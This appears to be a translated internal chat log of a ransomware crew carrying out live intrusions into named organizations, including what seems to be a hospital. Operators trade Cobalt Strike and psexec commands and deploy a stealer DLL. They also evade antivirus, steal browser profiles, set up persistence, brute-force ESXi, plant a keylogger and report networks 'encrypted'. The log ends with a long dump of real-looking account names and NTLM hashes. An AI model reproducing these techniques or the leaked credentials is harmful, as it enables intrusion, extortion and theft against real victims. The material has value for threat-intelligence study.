RPC not reachable.
But doesn't wmic work?
Admin's machines.
Can you see z1print's ports?
Or the admin's machines?
Yes.
Are you on that watchguard?
So wait.
Great ))
lf
`from Z1WATCHGUARD you can see 445,3389,139` a statement?
user4 will pull it in now and check; from Z1WATCHGUARD you can see 445,3389,139.
From z1print, are its 135,139,445,3389 visible?
Here's what I'm interested in.
No.
Something like "it's a virus" etc.
We can of course upload right away via file explorer, but a window will pop up for him right away.
Print, by the way, dropped off again almost immediately after we checked it yesterday.
Check from print.
No.
pf1d2swvz1print?
Where are you trying to get into it from?
programdata from the workstation
It got lost.
Workstation.
When uploading to the workstation, we wanted to copy from there to the admin's.
We uploaded it first to the workstation, where Trend is.
Or not only Trend.
After that I won't believe Trend is there.
And the exe dll?
Their AV dropped it immediately on copy.
Then the exe.
First the dll.
Can I run any of them?
Launch method:
`rundll32 pg.dll,StartDLL`
The files are single-use.
Yes.
Is he x64?
You drop it on his OS, run it, and the file will land next to the dll; the dll should delete itself once it has run.
I'm giving you the stealer dll.
Let's check )
OK, blind then.
Damn.
Echo worked.
OK, and echo 1 > test.txt
But it's empty.
The file does appear.
Are you sure it's even executing? )
Nope.
OK, whoami.
/v is just extended output - doesn't work.
Without /v.
I think it might be /q, but without it a window pops up.
No, it worked without quotes, at least we launched dlls without quotes.
In quotes?
Returns empty:
```
remote-exec psexec 10.22.0.13 cmd /q /c tasklist /V>C:\ProgramData\ssh\task.txt
```
```
itvm1:3389
Scanner module is complete
```
By IP?
```
beacon> portscan itvm1 3389 none 1
[Tasked beacon to scan ports 3389 on itvm1
[+] host called home, sent: 93245 bytes
[-] Could not connect to pipe: 2
```
Do another port scan for RDP.
OK, then I'll wait for the process list.
Is it yelling?
No, launching PS is conspicuous.
Yes.
His machine?
And also guys, did you check on TPS?
+
No, a couple of minutes.
Will the processes take long?
Trend Micro.
And tell me the AV.
He has 104 links from there in his history.
He's a frequent visitor there, by the way.
And tell me his processes )
And then read it via FS access.
Your task right now is to write tasklist /v to a file.
+ FS access.
We have a way to run commands via psexec.
Just in time.
Well then.
nix
That's not a DC.
Is vSphere hanging right on the DC or what?
Yes, this one.
Apparently this one is of interest to us?
`1803 https://vcz1dc1.gophersport.local/ui/#?extensionId=vsphere.core.inventory.serverObjectViewsExtension&objectId=urn:vmomi:VirtualMachine:vm-29463:7d9aedf7-e556-4c47-b666-fb1ecbb0b35c&navigator=vsphere.core.viTree.vmsAndTemplatesView vSphere - z1jbwmsprod1 - Summary 1 0 13252634877433381 0`
He has this thing:
`95 https://z1av.gophersport.local:4343/ Trend Micro 0 0 13235239430618240 1`
Which URL is of interest to us?
Then Edge.
There's no Chrome.
And check Chrome anyway.
`AppData\Local\Google\Chrome\User Data\Default\History`
I know that it's in this:
`C:\users\USERNAME\AppData\Local\Microsoft\Edge\User Data\Default\History`
Isn't the history stored in this file?
history
Is WebCacheV01.dat needed?
He has it open right now.
Send it over ))
Active )
Steal his History file.
So maybe his Edge is active? )
Yes.
Does he have 10?
Actually he also has ClickOnceForGoogleChome.exe in Downloads, so he might be using portable Chrome.
Can't look at the processes.
Dunno.
The question is different: does he use it?
Fine.
Well, from his profile.
Is it definitely his browser?
setg Proxies socks4:185.150.190.113:15452
Give me the proxy.
If anything, we tried to slip the profile into Mozilla on the dedi - it won't let us, it asks for an email or something like that.
When I say so, give the proxy.
Then now.
And I'm asking for a fresh version )
No, these were taken yesterday before leaving.
And everything's already ready.
I said it 1 minute ago.
If only everything worked that fast.
Did you just take them? )
The archive goes here.
This folder, profiles.
Take his browser right now.
To decode a profile in FF you need the master password plus, for some reason, the FF installation directory.
So while the VPN is up I'll try to find it.
But do you have DA from here?
Yes.
So it's a third-party machine (the guy is sitting over VPN); wouldn't it be better to set up persistence on some remote server so that we always have access to this network? I propose making persistence on all the trusts.
I launched you from the persistence.
So it's for...
Then I'll get persistence in this network and try to get onto the DC.
Yes, it arrived.
Is there?
And 1 flew off.
Shellcode missed.
Give me the dll.
Set it.
Into this conf.
I already sent the hashes.
Shellcode, please.
And here there was no DA?
`https://phanein.televisa.com.mx/vpn/index.html`
They have 2FA (((
If there are live sessions on it, you can spawn on `rawint.com`.
The network is big, I wouldn't want to screw it up.
As soon as the session comes alive I'll get persistence on some server.
I hope I'll manage to upload the adinfo here.
Have a nice rest, stay in touch.
Ah well, great, then I'll even manage to get some sleep myself.
We'll all be in the office on 15.10 at 13:00-14:00 Moscow time :space_invader:
I'll just clean up now... if I can.
So tell me what the plan is time-wise, because I'm not in the loop and I need to set an alarm to be up when you arrive to upload the dll builder.
And then I'll be disconnected.
Well, I still have 7-8 hours here anyway.
Neatly.
They died.
Like alive but at the same time not alive )
Everyone's like zombies.
Need to sleep properly.
Would like to tomorrow.
Yep.
Today*
Or rather today or tomorrow, I got confused.
What time are you coming tomorrow?
bb
1.done.sccy.com
bye
Take care.
Good night.
Monday at 5.
Then we're done.
OK.
We got cleaned out for a long time - there were no trusts?
The network is small, but you spent a decent amount of time on it.
```
Total servers per AD: 5
Live servers: 2
Pulled-in servers: 2
Total workstations per AD: 134
Live workstations: 28
Pulled-in workstations: 18
Everything encrypted
```
Stats go here then.
+
Finished?
AND EVERYONE'S DEAD
Practically, the last touches.
Launched the build.
Closed?
Until tomorrow.
OK.
Well, let's say around 11; I suppose tomorrow it's mostly reviews of the current cases, and the day after maybe something will go into the lock?
What time tomorrow?
And what time tomorrow?
At 22, yes.
Well then let's wrap up for today.
@tl2 home at 22?
No.
Well, in principle it's almost 22 already... @tl1 said what time tomorrow?
Until what hour?
We work from the morning.
Sorry guys, my Rocket dropped and I didn't notice; if anything, write if there's an urgent question.
Need to prepare for the close.
Give me your dll, I'll put you into the network and create a conf.
@user4 there'll be a separate task for you.
Like file-sharing services, ways of transferring files and so on.
I hope I don't need to explain that under a VPN you don't expose your resources?
Start from the /16 from here.
DNS?
@user7 check the routes tab.
OK.
OK, I got my slip-up, it'll all be there now.
You're strange ) you drop networks where you haven't hit a dead end yet and then you have no work )
And the DC you'll get from the subnet scan results.
By giving it the creds.
When you're connected by VPN you can perfectly well work with BloodHound.
```
so he won't even request a DA in any way without RDP
```
Of course it will.
And what to do: you have several accounts, there's a VPN, there are scanners, and you know how to work with VPN.
But there's a working VPN.
I understand when the login/pass didn't fit.
Generally yes.
Did I say you're responsible for them?
Was I supposed to actually lead the operation? "let go" - as I understood, I was just the question-asker here.
So he won't even request a DA in any way without RDP.
There were perfectly good options for working there.
Still unclear why you let @user7 off his task so easily.
+
I gather you're with @user8 for now.
And why didn't you work with this?
The VPN itself authenticates under these creds.
And the VPN itself?
Tried RDP, but not a single user can go over RDP.
In `lrhc.org` the enterprise turned out to have admin rights in the neighbouring domain; half a day was spent trying to pull ADinfo. Now a box with a 2003 server was found in the neighbouring domain, ms17_command works, we're thinking of adding a local admin there and working further from there.
In my last one there were 2 users. The creds of one didn't fit, the second has 2FA.
So for now we're working with @user8.
Well, how are things?
If there's progress on the current networks without a conf, collect the info locally; as soon as I come I'll create one right away.
OK.
I need to leave, I'll be back closer to 6.
+
Write me back in DM the names of the folders that were inside the archive.
Handed out to everyone.
Waiting.
I'll send the files in DM.
:thinking:
@user8 you're in charge of their tasks, I'll hold you to it )
He's the lead on this task for now.
In general, attack @user8 with questions.
Ah, I guess I just didn't quite understand about the indirect work.
We're sitting next to each other )
If that's what you mean?
I can give you three a conf for general questions.
They'll have their own networks, why join your conf?
@tl1 since @user4 and @user7 are with me, maybe you'll add them to the conf?
ok
Closer to 6-7 I'll give a network with DA and we'll prepare it for the close.
For the most part you're on your own today.
I'll give you the files like I gave him yesterday; for all questions, go to him.
@user4 @user7 you're working indirectly with your own.
Then so: @user3 works with the forum.
No.
I can't get any further, can I be put with user8 to help?
With yesterday's network, which has no access to the cobalts, I'm free (
Filling the forum.
Who's busy with what, by the way?
Then I'll explain today's tasks.
+
So, everyone's here?
hi
Hi all, we'll wait up to 20 min and start.
Present.
Let's start.
Hi all.
Nobody here yet?
hi
Rubriks found, esxi no \ no.
Any movement?
Doesn't work on esxi.
esx
no
vSphere
Here are the FTP creds.
Haven't got into esx yet.
No, in Rubrik.
So the FTP shell is a single one?
On esxi?
Over SSH there's no Linux there but its own shell.
Only SSH and web.
Does it let you in over FTP?
The second Rubrik.
Rubrik.
Didn't fit.
And there was no access to them via vCenter?
But they don't go to the esx boxes at all, only maybe over SSH.
No, mail is empty, mail is on gmail; we hung a keylogger.
Any movement?
Throw them onto cmd.
Didn't find it in mail?
Quite a lot.
2431 unique.
```
3675 Objects returned
```
Around 3k users, it seems.
I didn't count the unique ones; how many unique hashes are there?
Won't that be too fat?
Money-wise.
@tl1 @tl2 for brute-forcing SSH on the esxi boxes, can we throw the whole dcsync onto cmd5?
Well, and the VM that was encrypted yesterday.
The second one, still no idea where or how.
Nothing yet, I'm searching.
With esx creds it's no surprise they restored; they have backups on the esxi boxes + two Rubriks, in the first there are three clusters and backups replicate into each of them.
So what have we got here?
Until Monday.
What time tomorrow?
Well, OK.
Today I can't either.
Then tomorrow.
Yes.
Found the esx boxes, but today I don't really feel like closing; there's a pile of servers and a pile of workstations there - it'll drag on for about 6 hours.
Barely ))
Shanson has an mdb file.
Where and how?
Seems we found the esx password.
How late are you planning to sit?
How's it going?
Well, are you alive?
```
User name shanson Last logon 12/18/2020 3:22:23 PM
User name gsnelson Last logon 12/19/2020 2:57:41 PM
```
If they logged in today they'll be in tomorrow too.
Check the latest last logons of the people we need.
Doesn't the built-in one in Cobalt cope fine?
@tl2 do we have a keylogger?
I'll check the mail now.
On the desk, on a piece of paper lying around ))
So it may have remained in the email correspondence.
The guys don't want to store the vSphere passwords.
His - not yet.
Did you check the mail? But it's empty there.
Yes, I'm telling you, we opened those files.
Tried, but it didn't work, the bastard.
https://snapcraft.io/install/onenote-desktop/ubuntu#install
And we're also waiting for @tl2, maybe he'll solve the question )
Try to get onto that machine and have a look there.
No.
But there are no vSphere passwords there.
You also forgot about RDP with NTLM?
Then we move on to more complex methods.
From the browser.
lol, we guessed the password to the file ))
Install it on the dedi and have a look )
Here's the thing:
```
https://www.bitrecover.com/free/onenote-viewer/
```
I really want to test something ))
Well, please give me that .one file.
```
Take the help of OneNote Converter. This software allows you to read OneNote file without OneNote installation. This software also provides many advanced features. With this software, users can easily convert OneNote to PDF, OneNote to DOC, DOCX, OneNote to Image (png, jpg, tiff, bmp, and gif).
```
Here's the thing:
```
https://www.quora.com/How-can-a-person-read-a-OneNote-file-without-OneNote
```
Already happened with the Excel spreadsheet )
The password file is password-protected )
I've got one idea.
Send the file here please.
.one
What file format?
They don't work from the browser.
Huh?
Mimi doesn't work.
But no cleartext for him.
6 hours idle time.
Go in over RDP.
And if nobody's there anymore.
Check the time on the machine you took it from.
It says you have unlicensed software.
So.
Found a OneNote with notes about vSphere, downloaded it but it won't open.
192.168.0.247 found some third-party domain.
Good question, go write a request in the conf.
+ gopher
As soon as you pull everything in, the noise will start.
I take it all the noise comes from it working in a shitload of threads...
Well, if you pull everything in and map it in advance, then it's fine, isn't it?
And can't our programmers tune it so it makes less noise?
Will you make it in 6 hours after launch? )
I.e. 6 and 6 for the exe process itself.
And you either finish everything fully within 12 hours.
As soon as you launch, the countdown starts right away.
Then gopher doesn't seem like such a bad idea to me after all ))
Uh-huh, we scanned all the ports and I knocked on every one...
Damn.
There's no SSH on vSphere.
1) install winscp 2) put up a socks from the network (better from the machine of some technician or even a DA) 3) run the creds of everyone involved with vSphere against port 22 by IP, once each; one pair of creds.
Then the next quest for you ) you'll be getting into Linux.
I'll do it.
I need one volunteer.
And it was touched quite recently:
`Thursday, December 10, 2020 8:59:03 AM`
It's called vcenter but the admin panel is from esxi.
So it's definitely in use or they wouldn't have kept it 5 years.
They've had it for at least 5 years )
```
Monday, March 23, 2015 3:30:26 PM
```
Mixed it up )
I sent it personally.
No.
It was clear to everyone long ago.
So?
Damn, LRHV CENTER1, like this...
Give me the info about vSphere from ADinfo.
Here's what's odd: I'm digging through the admin shares; they have a pile of installers, a pile of scripts for installing/disabling updates etc., but not once did anything related to vsphere or veeam come up...
OK.
`DA - LA on the trust` means so.
User nmsapps is admin on the DC.
So the DA group is LA at the entry point.
In this domain, creds from lrhc work.
The DA has the same pass in different domains, kerb, DA - LA on the trust?
The good old-fashioned way: `shell dir`
How did they go?
Great.
D9NRDNH1-BSS$ 6d2a65c5202a1e20f9571d1aadacb30e 4096 2211 ELBOW-114$ e9788cba0ebac08894ac2594f84a2d13 4096 2210 BSS$ 1253830b83d4a50d0d5d89a5ffebca2b 4096 2131 ELBOW-23$ abaa96e48dcd800a1956368691e830c8 4096 2140 MLS1$ 23f85b04f30c79f4bcd84b7b7d5e888d 4096 2220 ELBOW-57$ f795c9c36119d3aca086f0b815678378 4096 2217 ELBOW-14$ 39151df3ef17c84716df58ea56e8a415 4128 2149 ACERASPIRE1$ 5f174595230b7af9e7da590c67cec747 4096 2232 LCA-TABLET$ 0eb7d994c7c21ecf65f24f403496993c 4096 2235 IWAM_ELEAHSERVER fa33eb92bc4e33cb808ae4f426f52974 66080 2185 TMM-E6400$ 4b3d39b7ac88fb0eab91cbb1e7832181 4096 2234 ELBOW-DEB$ dce6fa3ecaf59fee0beb6eef23ff11e1 4096 2129 ELBOW-18$ 3d7a43744425f993ccebc658f7cefef3 4096 2192 ELBOW-47$ 54012bc42e85be99b28c6100fe8595ff 4096 2112 ELBOW-122$ 06d1aceb9425cda01ac3ab1ba38343dc 4096 2207 ELBOW-90$ 4d801bd38128d0226f3b3355c1688ff2 4096 2177 ELBOW-322$ e4bb9151c5a6932431bfb352393ecba6 4096 2233 ACER-TMM$ d1418266362c9a75462ff5c6db09fe64 4096 2273 ELBOW-00$ aa97eb43126e70b34962544040117143 4096 2309 ADMINLAPTOP$ 90f4876c62856294b790f6e4d105541d 4096 2180 DFQH7SF1-CHERY$ 26e95f4d404c4a115d7d29381e8ac0cf 4096 2277 AC45A1CA-9A0C-4C9B-8 2ffb9c1ae2b5840acf2e0748129bba60 514 2361 ELBOW-123$ c419b2a25695936ef44e6c4f3cbde7d5 4098 2363 ELBOW-124$ e7b696f8741f96c95bab7f6421b4e209 4096 2367 ELBOW-128$ 087348e7f655e3770d9bbd66541d0e12 4096 2368 ELBOW-151$ 3b01e7331b20d40450330468969788e8 4096 2374 ELBOW-131$ 9fbc5a76dde43637aa57bffda728ea88 4096 2114 ELBOW-11$ ea367a201981ebe6aa92053c1b21493d 4096 2158 HOSP-PHARM$ b1c6e3798e4931af5e3b16eac81c9c6b 4096 2189 LBERG-LENOVOLT$ 590f000e8ee72aaabb71e3c28e2137bf 4096 2142 ELBOW-30$ 201cc04cecc2bb10b2a9c9cdf50a9613 4096 2397 MOTION1700$ 9ebfca863d35ba58227dcde5b5d46efc 4096 2155 MEDIC-AIR$ 377877e93baa394efafbfcd77902d500 4096 2396 YOUR-T0YNI9DL4P$ 63928409f36d079b113f478ac545298a 4096 2206 ELBOW-34$ 1c6bcb4d36722b0e9dc5e59fdf18cacc 4096 2162 BIOLAPTOP-$ 29806235ecbc6d6340dfabb57f1c6927 4096 2244 ELBOW-59$ 
62b601c27f74069136888a5b72db4797 4096 2209 ELBOW-54$ 952bbb508c6a48d5a72d5124f31edace 4096 2169 ELBOW-52$ f71f643018f02de46e081592812e0cc6 4096 2501 GREG-PC$ c594a1965f7c3fb23ce0dcb70207f57e 4096 2517 ELBOW-163$ 8f3dbbc6aa56fb7ccc030ba6c252d1a8 4096 2219 ELBOW-56$ ae7f06593d96e4fd64e60f0e21adb847 4096 2132 ELBOW-22$ 918f0ec2257a3338783de0af42fbba78 4096 2133 ELBOW-17$ fff2b2fc2ed9c6379f9274f16330fd14 4096 2191 ENCORE-XP$ 541136d932e9448cc178c833553b7331 4096 2134 ELBOW-16$ 6df9d74345c0d961c612433220af1fc1 4096 2165 ELBOW-39$ 30b840855273c13f5c67a4c9e025e67b 4096 2607 TERMINAL-VM$ 2073bd7749217b74916e91b17730fdae 4096 2606 PRAIRIERIDESP$ 38032fd1b9214dfa80d2607b791e9e6f 4096 2558 ELBOW-180-THINK$ fbd70668c408fea7c55276c7be780f2f 4096 2615 WINSERVER2012$ be09c89120c41f54c60d06ab4c5c0081 4096 2709 PRAIRIE-CCDA40D$ d6765c500e6625747f6dea6a9806dcad 4096 2370 ELBOW-133$ 9bff137ddce8110f35f734d2b7284d2a 4096 2637 ELBOW-256-2013$ bce01b884962dde1e8450620e018fa8d 4096 2270 LARRY-PC$ 979798807909392c993f9e1c3241a1b7 4096 2110 ELBOW-4$ 68818556c560fd8035e555f37b82ae45 4096 2738 ELSTERILEWKRM$ 13fd5fa6b22fd54e4c51b2cc31ace535 4096 2748 EL1F30$ 7e48f2391697a2f95c6ae1252c8c53fc 4096 2824 ELXX$ 0fac33f533439089096db7201e96afcb 4096 2456 FUJITSUTAB1$ 115d8606dd3e43a6891f54822dc29f4c 4096 2600 ELBOW-SCHOOLNUR$ 504233b467d9a3644003caf73a2be6e7 4096 2267 ELBOW-HOF$ 8d2b6da430466199702322aebfd7cd7c 4096 2747 EL1F31$ a90f7c64f20367a886d59bde26258127 4096 2695 TOM-THINK$ eb69e6af6620def9fa500df24f8f6429 4096 2153 ELBOW-41$ 8e78f6dd19f63f84fd67d5463d89a93a 4096 2869 ELBOW-330$ cbaed6fcf9bf608a0729b51d7ce3d3b7 4096 2882 LENOVO-TC-PC$ e303853867f813bbbdf6b1c092695d79 4096 2883 LENOVO-THINK-PC$ b0ee178054f615cd864811cb36addb03 4096 2884 LENOVO-EL-PC$ fb5ac93d067bae2265535df6c593f395 4096 2120 ELBOW-25$ 8c23af14df01cbf72e5a9259f27a08d7 4096 2892 DELL-VOSTRO-PC$ 489b9dc3d13f8e928f4dad56921ff98d 4096 2638 ELBOW-255-2013$ d55aba3efaf1dbcaeedc4dca0e7c83c3 4096 2121 ELBOW-33$ 
f43201f6c17d1da7f0073e6e3e92018a 4096 2762 ELC217$ a41fdab242eb2a5f59ff989cca668114 4096 2589 ELBOW-242$ 17138a59c75d8a84714e3e1791772c44 4096 2629 ELBOW-250-2013$ 4041e13faf3b2a4932b930d2ef41c4e5 4096 2742 EL1C30$ cecabded1f57b741910979d4e77a9b70 4096 2156 ELBOW-44$ 276ca91bd9cc90e7a2b690147e76cf4c 4096 2719 IT-LOANER$ e19c979e2e57e004b2975a33310a86a6 4096 2108 VOSTRO$ b0e18e40a78a2ee34b38ce4bb6df19a6 4098 2682 EXCHANGE$ c80b539c79899052a2a96edd987a95ce 4096 1244 SERVERTEST$ 6fa03485aefe980bc25576c412d5b3bc 4096 2605 XPVM$ 2420e0944baddf1bb4541a732e13a386 4096 2927 INFORMATION2B$ 6a6f2be454cfb60e98eafeca0c271459 4096 2727 ELBOWIP-113$ dcc5dbe4b040c60e3b548e59b0c79539 4098 2187 ELBOW-43$ 11b98d6b7a584abc5c444d4ce52c2190 4096 2272 ELEAH-985FEB5BB$ 5a0f6654fdece737c1f234d8e19906dd 4096 2987 VOSTRO-ER-PC$ a1e4b1bcf112ecebcd16f3c81276e7ac 4098 2992 PRAIRIEMED-PC$ 230356d29ff0f9b673dc6739cdc078d0 4096 2994 SPARE$ 7a1cf21e9b6206e13401a4931c07e146 4096 2993 LENOVO-ERBACKUP$ 49d11b67306bf133e7e0840966ac0f85 4098 2995 LENOVO-002$ fe514e8aab91e66c08312162f50b2c0c 4098 2959 ELBOW-88-PC$ 08c41b9fcf57df303805a9350c97161a 4098 3002 PTECH$ 605d47222050d1b67aa5f48629c5ff0c 4096 2831 ELBOWAVG$ c46098da8d85b9eff3b6bc0b255bf37b 4096 2172 ELBOW-515$ f915a4db39961f0d6a8b6160e810af1b 4096 3009 LENOVO-MORRIS$ e40cac82163ce2151668ae6f234a209e 4098 2274 ELBOW-6B609A4D4$ f9075e30a04d550f4c1b1b7bfd2430f0 4096 3010 TECH-PC$ fb050149675fcaa38b7efe9821ec4cf4 4096 3004 LDBLAPT-PC$ 5c9a4bcd1b529dc433caac2acbde7aea 4096 2122 RADIOLOGY$ a64dd04291e5d9dcb9e958f97330afd7 4096 2798 KATRINA--THINK$ 0c9b2cc9c193c810afefbeaea11a150f 4096 2384 ELBOW-138$ 84ab8c5a6424612bc133a5fd73b45bc4 4096 2375 ELEAH-53$ f34eb423b56a5c4a1002f77537dab3f4 4128 2125 ELBOW-VOSTRO$ 56f708a224408677101d13d2516685da 4096 2269 TMM-LTE6400$ b56bed280f295cab8f13fd520bc380ec 4096 3018 MCTRANSCRIPTION$ 2f9f464c0ea734d6f1076afea884b078 4096 2905 ELBOWDELL$ 332bc90c22e2198c079f32a2d1c5b2e7 4096 3061 SVOLKER$ 
41a8fdb2be919a751311c8388616df56 4096 1234 nshaw 7ce21f17c0aee7fb9ceba532d0546ad6 66082 2135 ELBOW-7$ 5c5171c91a00986633147bc1e59069c9 4096 2630 ELBOW-251-THINK$ 961b3fef4e9ee0596464769fcc0fcb6e 4096 2389 PT-603$ 2c50f2ff4eee17d583f6aab895686701 4096 3015 JAH$ 7364e85b292df298424f85c8df07b044 4096 2128 ELBOW-20$ 38bc18ce27b88900332220d41b6dc2a7 4096 2163 eleahadmin 56ed04d8382aa5c79b45b972f505d5e8 66048 2194 ELEAHPARAGON$ c490069946a11c1ead7de5fbb1c18f25 4096 2923 ELBOW-8-PC$ 8763f93fd186f370cc82d61dfb1ad1d8 4096 3112 ASHBY-500$ e5d06448b6e7e2fbe2f4ef7d6da860da 4096 2838 KWANDER$ 318366c8a69789510ab9a809bb9f32d6 4096 3060 MANDY-THINK$ 262e4b26eba2bf0b26992026bcdeca4c 4096 3037 JUNEZLAPTOP$ aaf2cd45ce795eb783cd54e847014328 4096 3124 JJGINGERICH$ 6178ac05ff66c0c0eb6936890613e834 4096 2435 CONFERENCE$ a75484e8761eebc11a2298273f827a01 4096 2998 ELBOW-PHARMACY$ 91126f5018be5c73c705661048e68627 4098 2917 LENOVO-2-PC$ fd9885b3fea93e9628bf3efeda4989af 4098 2608 7VM$ 258fb5c3abf2ad99256c000adc3e3c33 4096 2918 LENOVO-3-PC$ 3a1c35a6a4f1d2ed1ee2f8b9307c7749 4098 3138 SOLARWINDS$ f61fc51c8c0013d26e23f1ea3ac5eead 4096 2534 ELBOW-10$ 516460f2c7647b731edcc68277c7323e 4096 2388 ELBOW-143$ 4d64f0c50cfe77adf35854b511fa55cd 4096 2668 WORDSERVER2$ 46442a45f3cb9e2f7b07dbcc9ad54810 4096 1205 admit 7814985632c77ea80185b422fb2341ce 66080 2354 copymed d4037c73ef369d1c80ffd3053d038f9c 66048 2460 timeclock a9e033fc6f050b0e4fb5eb6a8c6065ee 66048 2136 provider f2325f4793903c5e7f7f3ab62ba39e02 66048 2896 review 0c05952f0ef5da033b14ec18bc32d4b1 66048 2467 Email 43d328e11e86b309cc19c247182fa9de 66048 2382 ELBOW-136$ 90fcf3de2ff792bdff5a4f8aca37a492 4098 3001 HOSPITALCONSULT$ babfb1662026c5dec32d5b811616a241 4098 2780 EL-HOSPCHART$ 9e3bd0ddf713073ff0850d5a5d1544b3 4098 2428 shawn 4658fc68d553a589b05122c9d3c8f7f1 66048 2457 FUJITSUTAB2$ c7b1a276f4d80e172e9a5e1e2534b555 4096 1204 xray beacd80369761138f6bb0aab8fc6210e 66080 3091 ELBOW-IT$ 3be52c9fb1e361168acc8406283a0647 4098 2385 ELBOW-139$ 
b73c0139ea4aa91efab42ec9f5068787 4098 3188 Scope2 7ce21f17c0aee7fb9ceba532d0546ad6 66048 2170 TECH$ d272014a8e7456a476497345a94a6641 4096 3174 THEDON$ 46abc5d7c7f7add082140e725132220b 4096 2392 ELBOW-146$ 9cd2b64083ae4febe3e9c3059f498859 4098 2912 1C30$ 26ecbe63ddd019d802690a97f8b36775 4098 2909 aholmes 64f12cddaa88057e06a81b54e73b949b 66048 2679 julrich de80b750f2d4a560062938a039f927ff 66048 2726 certegra 6a4da7a5af13fcc63e338705e64b9e64 66048 3170 ddcalerts 1c2f7f3b20a7a3c512c72c6551d5c8ae 66048 3175 jjacobson 49c2d216cbfd307353083901f4f13d38 512 2411 jlarue 58e8c758a4e67f34ef9c40944eb5535b 66048 2548 lerlandson a453f0a097a730833462ee1fa1f8e46a 66048 2482 mmouser 1203e31cf67f3296cdb4a92acaaf7147 512 3057 diabetes c241e32aa0bc4b2b50e678bcf840aa53 66048 3099 payercredentialing 970f8602fff271c199fb67c2c3e05b37 66048 3008 MCMR 64f12cddaa88057e06a81b54e73b949b 66048 2968 avgadmin 737cb5a48ab7b6364a2fa4d7cca34a5e 66048 2843 jnelson 8846f7eaee8fb117ad06bdd830b7586c 66048 2915 alien 64f12cddaa88057e06a81b54e73b949b 512 2409 tjohnson 73f430069cede14071df88a3fb8d1803 66048 2445 Board ea53eeaa4f25fb7493bd1ef6e513a83f 66048 2481 jcglynn 3bdbd1fcbf257122874eadd06d2f4438 66048 3089 prhhser 7ce21f17c0aee7fb9ceba532d0546ad6 512 2974 avg 737cb5a48ab7b6364a2fa4d7cca34a5e 512 2304 BESADMIN 02dfa0279cbc348532805ba7e2beeecc 66048 2357 info 737cb5a48ab7b6364a2fa4d7cca34a5e 66048 2664 kvigen 8846f7eaee8fb117ad06bdd830b7586c 66048 2667 dhaberer dfa4590739879203a5a97ae43ee464ba 66048 3100 medicalstaffservices fa29511ec929bf3bc6ac14823798d54a 66048 2996 elrad 7ce21f17c0aee7fb9ceba532d0546ad6 66048 2654 mcieniawski 4bea8d5d69ea47eeefe4a249eb732a44 66048 2407 shuseth e22e04519aa757d12f1219c4f31252f4 66048 1203 no1 db74c9408655f77f65b01d248fa459df 66082 3062 mmortenson 64f12cddaa88057e06a81b54e73b949b 66050 3036 kkalahar 64f12cddaa88057e06a81b54e73b949b 66050 3115 msterns 64f12cddaa88057e06a81b54e73b949b 514 2571 kpederson 0e616d815995bc636d891185c04bcb1c 66050 2195 mtsuser 
d5c314bd582ad9c6f7b7967e0d9233bc 66048 2201 ELEAHNTIERSRV$ c5caaec60e139aa803823ec85214f537 4096 2568 ELBOW-190$ 41342409b0261d4aad3b633c1010fda1 4096 2130 ELBOW-21$ 655d4814b1f0e20c0e334c54427c8e82 4096 3034 VIDEODRIVER$ bd848b672e04f5636f0b6666bdc2618d 4096 3219 ELBOW-SD$ 221bcf159b5d6fda008ba0d49161404c 4096 2144 INFORMATION2A$ 3cd37ac763a2041d929944a72c7e2aa1 4096 3234 ELBOW-500$ be6aaad23b2dda0cb933a5cec656f04c 4096 2561 ELBOW-182$ ce3fcee953efe2970b55307afcbb4fb3 4096 2921 jkohlman 64f12cddaa88057e06a81b54e73b949b 514 3053 mcd 5d471f25392112557cfff181f2c65f8b 66048 2532 ELBOW-170$ 1d8b438aed82cb116e958e68bf3493c9 4096 3132 ELBOW-141-2$ 48336b25be905800de3523d16b6a77a0 4096 3161 clohse 74b97c4ce24198d4af22db7910f3ef75 66048 2127 ELBOW-27$ 9b5a13c18b574af93a68dd310465fbf9 4096 3220 TRANSCRIPTION1$ 89005c049fa3bdd0e7288d0bf388c34f 4098 3224 ELBOW-212$ 0802cf5f4b34cc2cba98046f705baf1d 4096 2770 STRESSTEST$ 740be6b211f25ed8d3ab9c26237108fc 4096 2564 ELBOW-185-THINK$ 2160262d8cfdb5303e2081a4254378b4 4096 3033 JUNE-THINK$ f3b06aa4eb5bd2016a2e8f996bf5c2a4 4096 3135 ELBOW-2$ 9d3abf189b5dfb02ee3df6bf1e5fa3ad 4098 2592 ELBOW-48$ 7be6eccca6c9bc1daf8ac02aebdb788b 4098 3298 PRHELBOW-2$ f34babc74e79e1bff25cdac38e7f2448 4098 3299 PRHELBOW-48$ 07239f5dc88877d6d77057198060e83a 4098 3123 ELBOW-50$ fc6bba7639dab76d8b2ab18d3dad3545 4098 2559 ELBOW-181$ 1a23e4b2b3d1ec604b104533f9d375c2 4096 2429 michelle 91a2fe075906348f700df87131f9e3aa 66050 3325 PRH-ELMAINT$ b9f3237534a6f560b7bccd0c542e4856 4098 3255 PRHELBOC$ 29ac65f69caeafcea616aac37735e279 4096 2973 TANYA-MED_RECOR$ c706038eac16273895a8d1359634fee0 4096 2870 ELBOW-HP$ 3c9dfa6e8b6b59d74aa9a3e376c95acf 4096 3304 PRH-MORRIS-161$ fb8651559b7a4a338882d317017ef7c0 4096 2771 MCDICTATION$ 47c542f936dbc80bb58528d2c135c647 4096 2916 PFANDRICH$ 35a29c9bab2a15e221490b49698b48 4096 3283 PRH-0722$ c5850ee75e307f7ed07e4df6b49fe778 4096 2183 IUSR_ELEAHSERVER 7bde30ce679859e2e2709754e03947c8 66080 2544 PrintTrackerUser 
